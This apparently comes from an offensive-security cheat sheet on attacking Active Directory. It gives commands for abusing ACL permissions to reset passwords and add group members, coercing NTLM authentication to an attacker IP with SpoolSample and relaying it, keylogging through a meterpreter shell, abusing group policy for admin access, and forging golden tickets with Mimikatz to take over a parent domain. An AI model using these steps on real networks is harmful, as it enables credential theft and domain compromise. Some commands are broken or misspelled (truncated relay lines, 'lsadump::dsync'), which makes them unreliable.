killchain-compendium/Cryptography/Active Directory/AD

184 lines
5.7 KiB

# Active Directory Misconfigurations
## Permission Delegation
* Permissions to functions may be delegated as a standard functions itself
* Privilege creep becomes a problem eventually
* Discretionary ACLs are controlled by Access Control Entries (ACEs)
### The following ACEs are critical and prone to be exploited
* __GenericAll__, complete control and creation of an object
* __ForceChangePassword__, change the password of a user and sometimes administrator passwords
* __AddMembers__, add a user to an existing group
* __GenericWrite__, update any non-protected parameters of the target, e.g. paths to scripts.
* __WriteOwner__, change owner of a target object.
* __WriteDACL__, create new ACEs to an object's DACL
* __AllExtendendRights__ all control over an object's permission
### Tools to exploit ACEs
* Powersploit
* BloodHound, check permissions to target
### Usage
* Add user to a group via powershell
Add-GroupMember "<GroupName>" -Members "<username>"
* List info about groups, preferably administration groups
Get-ADGroupMember -Identity "<GroupName>"
* __Set new password for user__, afterwards reconnect session
$Password = ConvertTo-SecureString "password123#" -AsPlainText -Force
Set-ADAccountPassword -Identity "<username>" -Reset -NewPassword $Password
## Kerberos Delegation
* Unconstrained (without limit) delegation, [exploit](
* Constrained delegation
* Resource based constrained delegation (RBCD), service owner specifies which resources can bind. Set by [msDS-AllowedToActOnBehalfOfOtherIdentity](
### Delegatable Services
* __HTTP__
* __CIFS__
* __LDAP__
* __HOST__
* __MSSQL__
### Usage
* Enumerate via powerview
Import-Module .\PowerView.ps1
Get-NetUser -TrustedToAuth
## Automated Relays
### Machine Accounts
* Administrative machine account of one host having administrative permissions over another host
### Printers
* Target has to have an SMB server
* Spooler, PetitPotam, PrintNightmare are printer exploits
* Query printer services through a servers domain
GWMI Win32_Printer -Computer <domain>
Get-PrinterPort -ComputerName <domain>
* SMB signing may be enabled but must not be enforced in order for the exploit to work, check via
nmap --script smb2-securitymode -p 445
* Start SMB relay on attacker, use IP instead of domain to trigger NTLM auth
```sh -smb2support -t smb://"$TARGET_IP" -debug
* Authenticate on attacker with the credentials already gained from a windows computer
SpoolSample.exe <domain> "$ATTACKER_IP"
* Authenticate with the received credential
```sh -smb2support -t smb://"$TARGET_IP" -debug -c 'whoami /all' -debug
## Active Directory Users
### Credentials
### Keylogging
* With a meterpreter shell migrate to an active user's process and set a keylogger
migrate <processID>
* To inspect the results
## Group Policy Objects
* Every `GPO` has a `GUID`
* Local Policies are configured for application rules for FW, Windows-Defender, Applocker
* Other local policies are group memberships, startup config, protocols
* Group policies change configuration of these remotely over AD
* `GPOs` are stored on the `SYSVOL` to be distributed to any machine in the domain
### Usage
* Target is to add the user to either an RDP or SSH group and to connect via this group afterwards
* Start a `cmd` with a AD user and execute `mmc` through it
runas /netonly /user:<domain>\<username> cmd.exe
* Check connection of the `cmd.exe` via
dir \\<domain>\sysvol
* Click `File` -> Add/Remove Snap-in -> `Group Policy Management` -> `OK`
* On the left tree do `Group Policy Management` -> `Forest bla` -> `Domains` -> `<domain>` -> `Server` -> `Management Servers` and right click to edit the group
* On the left tree `Computer Configuration` -> `Policies` -> `Windows Settings` -> `Security Settings` -> right click `Restricted Groups` -> `Add Group` -> name like `IT Support` -> edit the group and Add `Administrators` and `Remote Desktop Users` groups
## Certificates
* [AD Certificate Services](./
## Domain Trusts
* Domain Trusts offer access to resources to users in the domain
* Directional, from trusted domain to another truster domain
* Transitive, beyond more than just one other domain
* Pwn parent child relationship between directional domain trusts via krbtgt and a golden ticket
* `krbtgt` as an account signs and encrypts TGTs
* Crafting a golden ticket by becoming a TGS. Following info is needed
* Security identifier of the domain (SI)
* Target's username
* __KRBTGT password hash__ store on the DC
### Usage
* `KRBTGT` via Mimikatz, resulting in `Hash NTLM`
lsadump::dsync /user:<username\kbtgt>
* Craft the ticket with the help of this hash
* Alternatively, InterRealm TGTs are used to get resources between domains in order to pwn the parent by adding the Enterprise Admin group as an extraSID,commonly this is `S-1-5-21-<RootDomain>-519`
* SID of Child DC is needed, as well as the SID of the Enterprise Admin in the parent domain
* Get child SIDs via
Get-ADComputer -Identity "<DCChildCN>"
* Get parent SID via
Get-ADGroup -Identity "Enterprise Admins" -Server <domain>
* Include additional SIDs from other domains into `KERB_VALIDATION_INFO` via Mimikatz
kerberos golden /user:Administrator /domain:<child.domain> /sid:<ChildSID> /service:kbtgt /rc4:<NTLMHash of krbtgt> /sids:<Enterprise Admin group SID> /ptt
dir \\DCdomain\dir$
dir \\Parentdomain\dir$